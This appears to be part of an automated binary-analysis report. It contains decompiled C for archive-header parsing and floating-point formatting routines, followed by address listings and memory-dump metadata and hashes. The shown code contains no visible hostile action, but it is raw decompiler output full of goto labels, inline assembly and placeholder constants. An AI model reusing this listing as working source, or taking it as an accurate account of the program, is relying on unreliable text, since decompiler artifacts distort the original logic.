    												__eflags = _t458 & 0x00000040;
    												if((_t458 & 0x00000040) == 0) {
    													goto L65;
    												}
    												_t302 = 1;
    												L66:
    												 *((char*)(_t539 + 0x10f0)) = _t302;
    												_t304 =  *(_t539 + 0x1094) & 1;
    												 *(_t539 + 0x10f1) = _t304;
    												asm("sbb eax, eax");
    												 *(_t539 + 0x10f4) =  !( ~(_t304 & 0x000000ff)) & 0x00020000 << (_t458 >> 0x0000000a & 0x0000000f);
    												asm("sbb eax, eax");
    												 *(_t539 + 0x109c) =  ~( *(_t539 + 0x109b) & 0x000000ff) & 0x00000005;
    												__eflags = _t521 - 0x1fff;
    												if(_t521 >= 0x1fff) {
    													_t521 = 0x1fff;
    												}
    												E0083C39D(_t544 + 0x30, _t544 - 0x2074, _t521);
    												 *((char*)(_t544 + _t521 - 0x2074)) = 0;
    												_push(0x800);
    												_t522 = _t539 + 0x28;
    												_push(_t539 + 0x28);
    												_push(_t544 - 0x2074);
    												E008410BC();
    												_t462 =  *(_t544 + 0x58);
    												__eflags = _t462 |  *(_t544 + 0x54);
    												if((_t462 |  *(_t544 + 0x54)) != 0) {
    													E008320F7(_t394, _t544 + 0x30, _t462, _t539);
    												}
    												_t319 =  *(_t544 + 0x60);
    												__eflags =  *(_t544 + 0x60) - 2;
    												if( *(_t544 + 0x60) != 2) {
    													L72:
    													_t320 = E00852BC9(_t319, _t522, L"CMT");
    													__eflags = _t320;
    													if(_t320 == 0) {
    														 *((char*)(_t394 + 0x6cb6)) = 1;
    													}
    													goto L74;
    												} else {
    													E00832028(_t394, _t539);
    													_t319 =  *(_t544 + 0x60);
    													__eflags =  *(_t544 + 0x60) - 2;
    													if( *(_t544 + 0x60) == 2) {
    														L74:
    														__eflags =  *(_t544 + 0x6b);
    														if(__eflags != 0) {
    															E00831F29(__eflags, 0x1c, _t394 + 0x1e, _t522);
    														}
    														goto L84;
    													}
    													goto L72;
    												}
    											}
    										}
    										__eflags = _t290 - _t502;
    										if(_t290 > _t502) {
    											goto L52;
    										}
    										goto L51;
    									}
    								}
    								__eflags = _t500 - 4;
    								if(_t500 == 4) {
    									_t470 = 5;
    									memcpy(_t394 + 0x2248, _t394 + 0x21e4, _t470 << 2);
    									_t331 = E0083C43B(_t500);
    									__eflags = _t331;
    									if(_t331 == 0) {
    										 *(_t394 + 0x225c) = E0083C43B(_t500) & 0x00000001;
    										_t335 = E0083C2EE(_t544 + 0x30) & 0x000000ff;
    										 *(_t394 + 0x2260) = _t335;
    										__eflags = _t335 - 0x18;
    										if(_t335 <= 0x18) {
    											E0083C39D(_t544 + 0x30, _t394 + 0x2264, 0x10);
    											__eflags =  *(_t394 + 0x225c);
    											if( *(_t394 + 0x225c) != 0) {
    												E0083C39D(_t544 + 0x30, _t394 + 0x2274, 8);
    												E0083C39D(_t544 + 0x30, _t544 + 0x64, 4);
    												E0083F55A(_t544 - 0x74);
    												E0083F5A0(_t544 - 0x74, _t394 + 0x2274, 8);
    												_push(_t544 + 8);
    												E0083F46B(_t544 - 0x74);
    												_t350 = E0084F3CA(_t544 + 0x64, _t544 + 8, 4);
    												asm("sbb al, al");
    												_t352 =  ~_t350 + 1;
    												__eflags = _t352;
    												 *(_t394 + 0x225c) = _t352;
    											}
    											 *((char*)(_t394 + 0x6cbc)) = 1;
    											goto L84;
    										}
    										_push(_t335);
    										_push(L"hc%u");
    										L40:
    										_push(0x14);
    										_push(_t544);
    										E00833F53();
    										E00833EFE(_t394, _t394 + 0x1e, _t544);
    										goto L86;
    									}
    									_push(_t331);
    									_push(L"h%u");
    									goto L40;
    								}
    								__eflags = _t500 - 5;
    								if(_t500 == 5) {
    									_t479 = _t500;
    									memcpy(_t394 + 0x4590, _t394 + 0x21e4, _t479 << 2);
    									 *(_t394 + 0x45ac) = E0083C43B(_t500) & 0x00000001;
    									 *((short*)(_t394 + 0x45ae)) = 0;
    									 *((char*)(_t394 + 0x45ad)) = 0;
    								}
    								goto L84;
    							}
    							_t484 = E0083C43B(_t498);
    							 *(_t544 + 0x54) = _t498;
    							_t256 = 0;
    							 *(_t544 + 0x58) = _t484;
    							__eflags = _t498;
    							if(__eflags < 0) {
    								goto L30;
    							}
    							if(__eflags > 0) {
    								goto L85;
    							}
    							__eflags = _t484 -  *(_t394 + 0x21f0);
    							if(_t484 >=  *(_t394 + 0x21f0)) {
    								goto L85;
    							}
    							goto L30;
    						}
    						E00831FE3(_t394);
    						 *((char*)(_t394 + 0x6cc4)) = 1;
    						E00836F18(0x8700e0, 3);
    						__eflags =  *((char*)(_t544 + 0x6a));
    						if(__eflags == 0) {
    							goto L26;
    						} else {
    							E00831F29(__eflags, 4, _t394 + 0x1e, _t394 + 0x1e);
    							 *((char*)(_t394 + 0x6cc5)) = 1;
    							goto L86;
    						}
    					}
    					L17:
    					E00833EBD(_t394, _t498, _t565);
    					goto L86;
    				}
    				_t498 =  *((intOrPtr*)(__ecx + 0x6cc0)) + 8;
    				asm("adc eax, ecx");
    				_t556 =  *((intOrPtr*)(__ecx + 0x6ca4));
    				if(_t556 < 0 || _t556 <= 0 &&  *((intOrPtr*)(__ecx + 0x6ca0)) <= _t498) {
    					goto L15;
    				} else {
    					_push(0x10);
    					_push(_t544 + 0x18);
    					 *((char*)(_t544 + 0x6a)) = 1;
    					if( *((intOrPtr*)( *_t394 + 0xc))() != 0x10) {
    						goto L17;
    					}
    					if( *((char*)( *((intOrPtr*)(_t394 + 0x21bc)) + 0x5124)) != 0) {
    						L7:
    						 *(_t544 + 0x6b) = 1;
    						L8:
    						E00833D52(_t394);
    						_t529 = _t394 + 0x2264;
    						_t543 = _t394 + 0x1024;
    						E008361AA(_t543, 0, 5,  *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024, _t394 + 0x2264, _t544 + 0x18,  *(_t394 + 0x2260), 0, _t544 + 0x28);
    						if( *(_t394 + 0x225c) == 0) {
    							L13:
    							 *((intOrPtr*)(_t544 + 0x50)) = _t543;
    							goto L16;
    						} else {
    							_t378 = _t394 + 0x2274;
    							while(1) {
    								_t380 = E0084F3CA(_t544 + 0x28, _t378, 8);
    								_t546 = _t546 + 0xc;
    								if(_t380 == 0) {
    									goto L13;
    								}
    								_t563 =  *(_t544 + 0x6b);
    								_t381 = _t394 + 0x1e;
    								_push(_t381);
    								_push(_t381);
    								if( *(_t544 + 0x6b) != 0) {
    									_push(6);
    									E00831F29(__eflags);
    									 *((char*)(_t394 + 0x6cc5)) = 1;
    									E00836F18(0x8700e0, 0xb);
    									goto L86;
    								}
    								_push(0x7c);
    								E00831F29(_t563);
    								E0083E7CD( *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024);
    								E00833D52(_t394);
    								E008361AA(_t543, 0, 5,  *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024, _t529, _t544 + 0x18,  *(_t394 + 0x2260), 0, _t544 + 0x28);
    								_t378 = _t394 + 0x2274;
    								if( *(_t394 + 0x225c) != 0) {
    									continue;
    								}
    								goto L13;
    							}
    							goto L13;
    						}
    					}
    					_t392 = E00840FE2();
    					 *(_t544 + 0x6b) = 0;
    					if(_t392 == 0) {
    						goto L8;
    					}
    					goto L7;
    				}
    			}





























































    0x0083320f
    0x00833217
    0x00833221
    0x00833228
    0x0083322f
    0x00833236
    0x00833239
    0x00833242
    0x0083338b
    0x0083338b
    0x0083338e
    0x00833393
    0x00833398
    0x0083339b
    0x008333ac
    0x008333b3
    0x008333c3
    0x008333cd
    0x008333cf
    0x008333d6
    0x008333d8
    0x00833a08
    0x00833a0a
    0x00833a0f
    0x00833a12
    0x00833a20
    0x00833a2b
    0x00833a2b
    0x008333de
    0x008333e0
    0x00000000
    0x00000000
    0x008333e6
    0x008333ec
    0x008333ee
    0x008333ee
    0x008333f0
    0x008333f3
    0x00000000
    0x00000000
    0x008333f9
    0x008333fc
    0x00000000
    0x00000000
    0x00833406
    0x0083340b
    0x0083340e
    0x00000000
    0x00000000
    0x00833413
    0x00833425
    0x0083342b
    0x00833430
    0x0083343b
    0x0083343d
    0x00833446
    0x0083344c
    0x00833452
    0x00833458
    0x0083345b
    0x0083345e
    0x00833460
    0x0083349a
    0x0083349a
    0x0083349c
    0x008334a3
    0x008334a6
    0x008334a9
    0x008334d3
    0x008334d3
    0x008334da
    0x008334dc
    0x008334df
    0x008334e2
    0x008334e7
    0x008334ec
    0x008334ee
    0x008334f1
    0x008334f1
    0x008334fc
    0x00833509
    0x00833518
    0x00833521
    0x00833529
    0x00833530
    0x00833536
    0x00833538
    0x00833949
    0x00833958
    0x00833959
    0x00833963
    0x0083396c
    0x00833979
    0x00833988
    0x00833993
    0x00833996
    0x0083399c
    0x008339a2
    0x008339a4
    0x008339aa
    0x008339ad
    0x008339c4
    0x008339af
    0x008339b7
    0x008339bf
    0x008339c1
    0x008339c1
    0x008339ca
    0x008339d1
    0x008339db
    0x008339db
    0x00000000
    0x008339d3
    0x008339d3
    0x008339d9
    0x008339dd
    0x008339dd
    0x008339e3
    0x008339e8
    0x008339eb
    0x008339fb
    0x008339fb
    0x00833a00
    0x00833a03
    0x00000000
    0x00833a03
    0x00000000
    0x008339d9
    0x008339d1
    0x0083353e
    0x00000000
    0x00000000
    0x00833544
    0x00833547
    0x00833689
    0x00833691
    0x008336a0
    0x008336a4
    0x008336a7
    0x008336ae
    0x008336b5
    0x008336c0
    0x008336c3
    0x008336c9
    0x008336d2
    0x008336d9
    0x008336e7
    0x008336f2
    0x00833701
    0x00833701
    0x00833703
    0x00833709
    0x0083370f
    0x00833716
    0x0083371c
    0x0083371c
    0x00833722
    0x00833728
    0x0083372e
    0x00833734
    0x0083373a
    0x0083373c
    0x00833744
    0x00833744
    0x00833746
    0x00000000
    0x0083373e
    0x0083373e
    0x00833748
    0x00833748
    0x00833751
    0x00833757
    0x0083375c
    0x00833763
    0x00833766
    0x00833779
    0x00833779
    0x0083377e
    0x00833785
    0x0083378c
    0x00833791
    0x008337a0
    0x008337a0
    0x008337a6
    0x008337b0
    0x008337b7
    0x008337c0
    0x008337c8
    0x008337cb
    0x008337ce
    0x008337d1
    0x008337d3
    0x008337d3
    0x008337e5
    0x008337f9
    0x008337fb
    0x00833805
    0x0083380a
    0x00833810
    0x00833812
    0x0083381c
    0x0083381e
    0x00833820
    0x00833820
    0x00833820
    0x00833820
    0x00833814
    0x00833814
    0x00833814
    0x00833827
    0x00833831
    0x00833843
    0x00833849
    0x0083384d
    0x00833850
    0x00833856
    0x00833861
    0x00833861
    0x00833861
    0x00000000
    0x00833858
    0x00833858
    0x0083385b
    0x00000000
    0x00000000
    0x0083385d
    0x00833863
    0x00833863
    0x0083386f
    0x00833874
    0x00833889
    0x0083388f
    0x0083389e
    0x008338a3
    0x008338ae
    0x008338b0
    0x008338b2
    0x008338b2
    0x008338bf
    0x008338c4
    0x008338d2
    0x008338d7
    0x008338da
    0x008338db
    0x008338dc
    0x008338e1
    0x008338e6
    0x008338e9
    0x008338f3
    0x008338f3
    0x008338f8
    0x008338fb
    0x008338fe
    0x00833910
    0x00833916
    0x0083391d
    0x0083391f
    0x00833921
    0x00833921
    0x00000000
    0x00833900
    0x00833903
    0x00833908
    0x0083390b
    0x0083390e
    0x00833928
    0x00833928
    0x0083392c
    0x00833939
    0x00833939
    0x00000000
    0x0083392c
    0x00000000
    0x0083390e
    0x008338fe
    0x00833856
    0x00833740
    0x00833742
    0x00000000
    0x00000000
    0x00000000
    0x00833742
    0x0083373c
    0x0083354d
    0x00833550
    0x00833591
    0x0083359e
    0x008335a3
    0x008335a8
    0x008335aa
    0x008335e1
    0x008335ec
    0x008335ef
    0x008335f5
    0x008335f8
    0x0083360e
    0x00833613
    0x0083361a
    0x00833628
    0x00833636
    0x0083363f
    0x0083364b
    0x00833653
    0x00833658
    0x00833667
    0x00833671
    0x00833673
    0x00833673
    0x00833675
    0x00833675
    0x0083367b
    0x00000000
    0x0083367b
    0x008335fa
    0x008335fb
    0x008335b2
    0x008335b5
    0x008335b7
    0x008335b8
    0x008335ca
    0x00000000
    0x008335ca
    0x008335ac
    0x008335ad
    0x00000000
    0x008335ad
    0x00833552
    0x00833555
    0x0083355c
    0x00833569
    0x00833575
    0x0083357d
    0x00833584
    0x00833584
    0x00000000
    0x00833555
    0x008334b3
    0x008334b5
    0x008334b8
    0x008334ba
    0x008334bd
    0x008334bf
    0x00000000
    0x00000000
    0x008334c1
    0x00000000
    0x00000000
    0x008334c7
    0x008334cd
    0x00000000
    0x00000000
    0x00000000
    0x008334cd
    0x00833464
    0x00833470
    0x00833477
    0x0083347c
    0x00833480
    0x00000000
    0x00833482
    0x00833489
    0x0083348e
    0x00000000
    0x0083348e
    0x00833480
    0x0083339d
    0x0083339f
    0x00000000
    0x0083339f
    0x00833250
    0x00833253
    0x00833255
    0x0083325b
    0x00000000
    0x0083326f
    0x00833274
    0x00833276
    0x00833279
    0x00833283
    0x00000000
    0x00000000
    0x00833296
    0x008332a5
    0x008332a5
    0x008332a9
    0x008332ab
    0x008332c7
    0x008332d3
    0x008332df
    0x008332eb
    0x00833367
    0x00833367
    0x00000000
    0x008332ed
    0x008332ed
    0x008332f3
    0x008332fa
    0x008332ff
    0x00833304
    0x00000000
    0x00000000
    0x00833306
    0x0083330a
    0x0083330d
    0x0083330e
    0x0083330f
    0x0083336c
    0x0083336e
    0x0083337a
    0x00833381
    0x00000000
    0x00833381
    0x00833311
    0x00833313
    0x00833324
    0x0083332b
    0x00833353
    0x0083335f
    0x00833365
    0x00000000
    0x00000000
    0x00000000
    0x00833365
    0x00000000
    0x008332f3
    0x008332eb
    0x00833298
    0x0083329d
    0x008332a3
    0x00000000
    0x00000000
    0x00000000
    0x008332a3

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: H_prolog_memcmp
    • String ID: CMT$h%u$hc%u
    • API String ID: 3004599000-3282847064
    • Opcode ID: 11fcd5cf15e8b68072b78b2c36005e32669a56142a337ad06dfad2538d28cc67
    • Instruction ID: 2452ee0af4387f3081072623d9a54e5ab3dfccfb9bb00c2f2fd4f6d81f43130d
    • Opcode Fuzzy Hash: 11fcd5cf15e8b68072b78b2c36005e32669a56142a337ad06dfad2538d28cc67
    • Instruction Fuzzy Hash: F032C1715006889FDF14DF68C895AEA3BA5FF94300F04447DFD8ADB282DB749A49CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 67%
    			E0085C5AE(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
    				signed int _v8;
    				signed int _v32;
    				signed int _v36;
    				char _v460;
    				signed int _v464;
    				void _v468;
    				signed int _v472;
    				signed int _v932;
    				signed int _v936;
    				signed int _v1392;
    				signed int _v1396;
    				signed int _v1400;
    				char _v1860;
    				signed int _v1864;
    				signed int _v1865;
    				signed int _v1872;
    				signed int _v1876;
    				signed int _v1880;
    				signed int _v1884;
    				signed int _v1888;
    				signed int _v1892;
    				signed int _v1896;
    				intOrPtr _v1900;
    				signed int _v1904;
    				signed int _v1908;
    				signed int _v1912;
    				signed int _v1916;
    				signed int _v1920;
    				signed int _v1924;
    				signed int _v1928;
    				char _v1936;
    				char _v1944;
    				char _v2404;
    				signed int _v2408;
    				signed int _t743;
    				signed int _t753;
    				signed int _t754;
    				intOrPtr _t763;
    				signed int _t764;
    				intOrPtr _t767;
    				intOrPtr _t770;
    				intOrPtr _t772;
    				intOrPtr _t773;
    				void* _t774;
    				signed int _t778;
    				signed int _t779;
    				signed int _t785;
    				signed int _t791;
    				intOrPtr _t793;
    				void* _t794;
    				signed int _t795;
    				signed int _t796;
    				signed int _t797;
    				signed int _t806;
    				signed int _t811;
    				signed int _t812;
    				signed int _t813;
    				signed int _t816;
    				signed int _t817;
    				signed int _t818;
    				signed int _t820;
    				signed int _t821;
    				signed int _t822;
    				signed int _t823;
    				signed int _t828;
    				signed int _t829;
    				signed int _t835;
    				signed int _t836;
    				signed int _t839;
    				signed int _t844;
    				signed int _t852;
    				signed int* _t855;
    				signed int _t859;
    				signed int _t870;
    				signed int _t871;
    				signed int _t873;
    				char* _t874;
    				signed int _t877;
    				signed int _t881;
    				signed int _t882;
    				signed int _t887;
    				signed int _t889;
    				signed int _t894;
    				signed int _t903;
    				signed int _t906;
    				signed int _t908;
    				signed int _t911;
    				signed int _t912;
    				signed int _t913;
    				signed int _t916;
    				signed int _t929;
    				signed int _t930;
    				signed int _t932;
    				char* _t933;
    				signed int _t936;
    				signed int _t940;
    				signed int _t941;
    				signed int* _t943;
    				signed int _t946;
    				signed int _t948;
    				signed int _t953;
    				signed int _t961;
    				signed int _t964;
    				signed int _t968;
    				signed int* _t975;
    				intOrPtr _t977;
    				void* _t978;
    				intOrPtr* _t980;
    				signed int* _t984;
    				unsigned int _t995;
    				signed int _t996;
    				void* _t999;
    				signed int _t1000;
    				void* _t1002;
    				signed int _t1003;
    				signed int _t1004;
    				signed int _t1005;
    				signed int _t1015;
    				signed int _t1020;
    				signed int _t1023;
    				unsigned int _t1026;
    				signed int _t1027;
    				void* _t1030;
    				signed int _t1031;
    				void* _t1033;
    				signed int _t1034;
    				signed int _t1035;
    				signed int _t1036;
    				signed int _t1041;
    				signed int* _t1046;
    				signed int _t1048;
    				signed int _t1058;
    				void _t1061;
    				signed int _t1064;
    				void* _t1067;
    				void* _t1074;
    				signed int _t1080;
    				signed int _t1081;
    				signed int _t1084;
    				signed int _t1085;
    				signed int _t1087;
    				signed int _t1088;
    				signed int _t1089;
    				signed int _t1093;
    				signed int _t1097;
    				signed int _t1098;
    				signed int _t1099;
    				signed int _t1101;
    				signed int _t1102;
    				signed int _t1103;
    				signed int _t1104;
    				signed int _t1105;
    				signed int _t1106;
    				signed int _t1108;
    				signed int _t1109;
    				signed int _t1110;
    				signed int _t1111;
    				signed int _t1112;
    				signed int _t1113;
    				unsigned int _t1114;
    				void* _t1117;
    				intOrPtr _t1119;
    				signed int _t1120;
    				signed int _t1121;
    				signed int _t1122;
    				signed int* _t1126;
    				void* _t1130;
    				void* _t1131;
    				signed int _t1132;
    				signed int _t1133;
    				signed int _t1134;
    				signed int _t1137;
    				signed int _t1138;
    				signed int _t1143;
    				void* _t1145;
    				signed int _t1146;
    				signed int _t1149;
    				char _t1154;
    				signed int _t1156;
    				signed int _t1157;
    				signed int _t1158;
    				signed int _t1159;
    				signed int _t1160;
    				signed int _t1161;
    				signed int _t1162;
    				signed int _t1166;
    				signed int _t1167;
    				signed int _t1168;
    				signed int _t1169;
    				signed int _t1170;
    				unsigned int _t1173;
    				void* _t1177;
    				void* _t1178;
    				unsigned int _t1179;
    				signed int _t1184;
    				signed int _t1185;
    				signed int _t1187;
    				signed int _t1188;
    				intOrPtr* _t1190;
    				signed int _t1191;
    				signed int _t1193;
    				signed int _t1194;
    				signed int _t1197;
    				signed int _t1199;
    				signed int _t1200;
    				void* _t1201;
    				signed int _t1202;
    				signed int _t1203;
    				signed int _t1204;
    				void* _t1207;
    				signed int _t1208;
    				signed int _t1209;
    				signed int _t1210;
    				signed int _t1211;
    				signed int _t1212;
    				signed int* _t1215;
    				signed int _t1216;
    				signed int _t1217;
    				signed int _t1218;
    				signed int _t1219;
    				intOrPtr* _t1221;
    				intOrPtr* _t1222;
    				signed int _t1224;
    				signed int _t1226;
    				signed int _t1229;
    				signed int _t1235;
    				signed int _t1239;
    				signed int _t1240;
    				signed int _t1245;
    				signed int _t1248;
    				signed int _t1249;
    				signed int _t1250;
    				signed int _t1251;
    				signed int _t1252;
    				signed int _t1253;
    				signed int _t1255;
    				signed int _t1256;
    				signed int _t1257;
    				signed int _t1258;
    				signed int _t1260;
    				signed int _t1261;
    				signed int _t1262;
    				signed int _t1263;
    				signed int _t1264;
    				signed int _t1266;
    				signed int _t1267;
    				signed int _t1269;
    				signed int _t1271;
    				signed int _t1273;
    				signed int _t1276;
    				signed int _t1278;
    				signed int* _t1279;
    				signed int* _t1282;
    				signed int _t1291;
    
    				_t1145 = __edx;
    				_t1276 = _t1278;
    				_t1279 = _t1278 - 0x964;
    				_t743 =  *0x86d668; // 0x14325215
    				_v8 = _t743 ^ _t1276;
    				_t1058 = _a20;
    				_push(__esi);
    				_push(__edi);
    				_t1190 = _a16;
    				_v1924 = _t1190;
    				_v1920 = _t1058;
    				E0085C0D3( &_v1944, __eflags);
    				_t1239 = _a8;
    				_t748 = 0x2d;
    				if((_t1239 & 0x80000000) == 0) {
    					_t748 = 0x120;
    				}
    				 *_t1190 = _t748;
    				 *((intOrPtr*)(_t1190 + 8)) = _t1058;
    				_t1191 = _a4;
    				if((_t1239 & 0x7ff00000) != 0) {
    					L5:
    					_t753 = E0085871A( &_a4);
    					_pop(_t1073);
    					__eflags = _t753;
    					if(_t753 != 0) {
    						_t1073 = _v1924;
    						 *((intOrPtr*)(_v1924 + 4)) = 1;
    					}
    					_t754 = _t753 - 1;
    					__eflags = _t754;
    					if(_t754 == 0) {
    						_push("1#INF");
    						goto L308;
    					} else {
    						_t778 = _t754 - 1;
    						__eflags = _t778;
    						if(_t778 == 0) {
    							_push("1#QNAN");
    							goto L308;
    						} else {
    							_t779 = _t778 - 1;
    							__eflags = _t779;
    							if(_t779 == 0) {
    								_push("1#SNAN");
    								goto L308;
    							} else {
    								__eflags = _t779 == 1;
    								if(_t779 == 1) {
    									_push("1#IND");
    									goto L308;
    								} else {
    									_v1928 = _v1928 & 0x00000000;
    									_a4 = _t1191;
    									_a8 = _t1239 & 0x7fffffff;
    									_t1291 = _a4;
    									asm("fst qword [ebp-0x768]");
    									_t1193 = _v1896;
    									_v1916 = _a12 + 1;
    									_t1080 = _t1193 >> 0x14;
    									_t785 = _t1080 & 0x000007ff;
    									__eflags = _t785;
    									if(_t785 != 0) {
    										_t1146 = 0;
    										_t785 = 0;
    										__eflags = 0;
    									} else {
    										_t1146 = 1;
    									}
    									_t1194 = _t1193 & 0x000fffff;
    									_t1061 = _v1900 + _t785;
    									asm("adc edi, esi");
    									__eflags = _t1146;
    									_t1081 = _t1080 & 0x000007ff;
    									_t1245 = _t1081 - 0x434 + (0 | _t1146 != 0x00000000) + 1;
    									_v1872 = _t1245;
    									E0085E110(_t1081, _t1291);
    									_push(_t1081);
    									_push(_t1081);
    									 *_t1279 = _t1291;
    									_t791 = E00860F60(E0085E220(_t1194, _t1245), _t1291);
    									_v1904 = _t791;
    									__eflags = _t791 - 0x7fffffff;
    									if(_t791 == 0x7fffffff) {
    										L16:
    										__eflags = 0;
    										_v1904 = 0;
    									} else {
    										__eflags = _t791 - 0x80000000;
    										if(_t791 == 0x80000000) {
    											goto L16;
    										}
    									}
    									_v468 = _t1061;
    									__eflags = _t1194;
    									_v464 = _t1194;
    									_t1064 = (0 | _t1194 != 0x00000000) + 1;
    									_v472 = _t1064;
    									__eflags = _t1245;
    									if(_t1245 < 0) {
    										__eflags = _t1245 - 0xfffffc02;
    										if(_t1245 == 0xfffffc02) {
    											L101:
    											_t793 =  *((intOrPtr*)(_t1276 + _t1064 * 4 - 0x1d4));
    											_t195 =  &_v1896;
    											 *_t195 = _v1896 & 0x00000000;
    											__eflags =  *_t195;
    											asm("bsr eax, eax");
    											if( *_t195 == 0) {
    												_t1084 = 0;
    												__eflags = 0;
    											} else {
    												_t1084 = _t793 + 1;
    											}
    											_t794 = 0x20;
    											_t795 = _t794 - _t1084;
    											__eflags = _t795 - 1;
    											_t796 = _t795 & 0xffffff00 | _t795 - 0x00000001 > 0x00000000;
    											__eflags = _t1064 - 0x73;
    											_v1865 = _t796;
    											_t1085 = _t1084 & 0xffffff00 | _t1064 - 0x00000073 > 0x00000000;
    											__eflags = _t1064 - 0x73;
    											if(_t1064 != 0x73) {
    												L107:
    												_t797 = 0;
    												__eflags = 0;
    											} else {
    												__eflags = _t796;
    												if(_t796 == 0) {
    													goto L107;
    												} else {
    													_t797 = 1;
    												}
    											}
    											__eflags = _t1085;
    											if(_t1085 != 0) {
    												L126:
    												_v1400 = _v1400 & 0x00000000;
    												_t224 =  &_v472;
    												 *_t224 = _v472 & 0x00000000;
    												__eflags =  *_t224;
    												E0085AABF( &_v468, 0x1cc,  &_v1396, 0);
    												_t1279 =  &(_t1279[4]);
    											} else {
    												__eflags = _t797;
    												if(_t797 != 0) {
    													goto L126;
    												} else {
    													_t1112 = 0x72;
    													__eflags = _t1064 - _t1112;
    													if(_t1064 < _t1112) {
    														_t1112 = _t1064;
    													}
    													__eflags = _t1112 - 0xffffffff;
    													if(_t1112 != 0xffffffff) {
    														_t1263 = _t1112;
    														_t1221 =  &_v468 + _t1112 * 4;
    														_v1880 = _t1221;
    														while(1) {
    															__eflags = _t1263 - _t1064;
    															if(_t1263 >= _t1064) {
    																_t208 =  &_v1876;
    																 *_t208 = _v1876 & 0x00000000;
    																__eflags =  *_t208;
    															} else {
    																_v1876 =  *_t1221;
    															}
    															_t210 = _t1263 - 1; // 0x70
    															__eflags = _t210 - _t1064;
    															if(_t210 >= _t1064) {
    																_t1173 = 0;
    																__eflags = 0;
    															} else {
    																_t1173 =  *(_t1221 - 4);
    															}
    															_t1221 = _t1221 - 4;
    															_t975 = _v1880;
    															_t1263 = _t1263 - 1;
    															 *_t975 = _t1173 >> 0x0000001f ^ _v1876 + _v1876;
    															_v1880 = _t975 - 4;
    															__eflags = _t1263 - 0xffffffff;
    															if(_t1263 == 0xffffffff) {
    																break;
    															}
    															_t1064 = _v472;
    														}
    														_t1245 = _v1872;
    													}
    													__eflags = _v1865;
    													if(_v1865 == 0) {
    														_v472 = _t1112;
    													} else {
    														_t218 = _t1112 + 1; // 0x73
    														_v472 = _t218;
    													}
    												}
    											}
    											_t1197 = 1 - _t1245;
    											E0084E920(_t1197,  &_v1396, 0, 1);
    											__eflags = 1;
    											 *(_t1276 + 0xbad63d) = 1 << (_t1197 & 0x0000001f);
    											_t806 = 0xbadbae;
    										} else {
    											_v1396 = _v1396 & 0x00000000;
    											_t1113 = 2;
    											_v1392 = 0x100000;
    											_v1400 = _t1113;
    											__eflags = _t1064 - _t1113;
    											if(_t1064 == _t1113) {
    												_t1177 = 0;
    												__eflags = 0;
    												while(1) {
    													_t977 =  *((intOrPtr*)(_t1276 + _t1177 - 0x570));
    													__eflags = _t977 -  *((intOrPtr*)(_t1276 + _t1177 - 0x1d0));
    													if(_t977 !=  *((intOrPtr*)(_t1276 + _t1177 - 0x1d0))) {
    														goto L101;
    													}
    													_t1177 = _t1177 + 4;
    													__eflags = _t1177 - 8;
    													if(_t1177 != 8) {
    														continue;
    													} else {
    														_t166 =  &_v1896;
    														 *_t166 = _v1896 & 0x00000000;
    														__eflags =  *_t166;
    														asm("bsr eax, edi");
    														if( *_t166 == 0) {
    															_t1178 = 0;
    															__eflags = 0;
    														} else {
    															_t1178 = _t977 + 1;
    														}
    														_t978 = 0x20;
    														_t1264 = _t1113;
    														__eflags = _t978 - _t1178 - _t1113;
    														_t980 =  &_v460;
    														_v1880 = _t980;
    														_t1222 = _t980;
    														_t171 =  &_v1865;
    														 *_t171 = _t978 - _t1178 - _t1113 > 0;
    														__eflags =  *_t171;
    														while(1) {
    															__eflags = _t1264 - _t1064;
    															if(_t1264 >= _t1064) {
    																_t173 =  &_v1876;
    																 *_t173 = _v1876 & 0x00000000;
    																__eflags =  *_t173;
    															} else {
    																_v1876 =  *_t1222;
    															}
    															_t175 = _t1264 - 1; // 0x0
    															__eflags = _t175 - _t1064;
    															if(_t175 >= _t1064) {
    																_t1179 = 0;
    																__eflags = 0;
    															} else {
    																_t1179 =  *(_t1222 - 4);
    															}
    															_t1222 = _t1222 - 4;
    															_t984 = _v1880;
    															_t1264 = _t1264 - 1;
    															 *_t984 = _t1179 >> 0x0000001e ^ _v1876 << 0x00000002;
    															_v1880 = _t984 - 4;
    															__eflags = _t1264 - 0xffffffff;
    															if(_t1264 == 0xffffffff) {
    																break;
    															}
    															_t1064 = _v472;
    														}
    														__eflags = _v1865;
    														_t1114 = _t1113 - _v1872;
    														_v472 = (0 | _v1865 != 0x00000000) + _t1113;
    														_t1224 = _t1114 >> 5;
    														_v1884 = _t1114;
    														_t1266 = _t1224 << 2;
    														E0084E920(_t1224,  &_v1396, 0, _t1266);
    														 *(_t1276 + _t1266 - 0x570) = 1 << (_v1884 & 0x0000001f);
    														_t806 = _t1224 + 1;
    													}
    													goto L128;
    												}
    											}
    											goto L101;
    										}
    										L128:
    										_v1400 = _t806;
    										_t1067 = 0x1cc;
    										_v936 = _t806;
    										__eflags = _t806 << 2;
    										E0085AABF( &_v932, 0x1cc,  &_v1396, _t806 << 2);
    										_t1282 =  &(_t1279[7]);
    									} else {
    										_v1396 = _v1396 & 0x00000000;
    										_t1267 = 2;
    										_v1392 = 0x100000;
    										_v1400 = _t1267;
    										__eflags = _t1064 - _t1267;
    										if(_t1064 != _t1267) {
    											L53:
    											_t995 = _v1872 + 1;
    											_t996 = _t995 & 0x0000001f;
    											_t1117 = 0x20;
    											_v1876 = _t996;
    											_t1226 = _t995 >> 5;
    											_v1872 = _t1226;
    											_v1908 = _t1117 - _t996;
    											_t999 = E0084DDE0(1, _t1117 - _t996, 0);
